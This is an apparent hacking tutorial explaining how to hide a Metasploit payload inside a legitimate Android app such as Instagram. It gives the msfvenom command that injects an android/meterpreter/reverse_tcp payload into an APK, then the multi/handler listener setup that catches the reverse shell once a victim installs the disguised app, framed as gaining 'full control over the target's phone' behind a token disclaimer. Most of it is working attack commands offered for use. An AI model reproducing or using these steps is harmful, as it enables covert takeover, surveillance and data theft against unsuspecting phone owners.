Hack android by poisoning apps 📱
Add malware to original app (ex: Instagram, flappybird)
when user runs the app, it acts and works like a normal app, but in a nutshell we have full control over the target's phone 👨💻
❗DO NOT USE THIS FOR ILLEGAL STUFF❗
REQUIREMENTS
- A decent hacking linux distro ( ex: Kali, Parrot ) [ RECOMMENDED ]
- Or a system with MSFVENOM & METASPLOIT [ MUST ]
- Target and attacker must be on same network (at least both should communicate with IPV4) [ MUST ]
1. DOWNLOAD AN APK FILE
You need an APK file to poison, you could download or create it .
2. POISON THE APP
We are going to use MSFVENOM to poison 💉
# format
msfvenom -x <downloaded-apk-file> -p android/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<ANY_PORT> -o payload.apk
-x is to select the APK file, -p refer to payload that we gonna use.
# for my case
msfvenom -x app.apk -p android/meterpreter/reverse_tcp LHOST=192.168.11.3 LPORT=4444 -o payload.apk
This will generate a payload.apk
in current folder
3. START LISTENER
We are using METASPLOIT for listener
Listener should be running before target use the app
Fire up METASPLOIT
$ msfconsole
use exploit/multi/handler
msf6 > use exploit/multi/handler
fill up the options, you can see all options by typing show option
we need to set LHOST
LPORT
& PAYLOAD
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <IP_USED_ON_PAYLOAD>
set LPORT <PORT_USED_ON_PAYLOAD>
run the exploit
run
Now listener will start, wait until victim install the app 👨💻
4. DELIVER THE APP
You could use any delivering method to give app to target phone
[ I'm gonna skip this part because this is not our topic ]
When victim install the app, you should get a Meterpreter shell back CONGRATULATIONS, YOU HACKED IN TO AN ANDROID DEVICE 🎉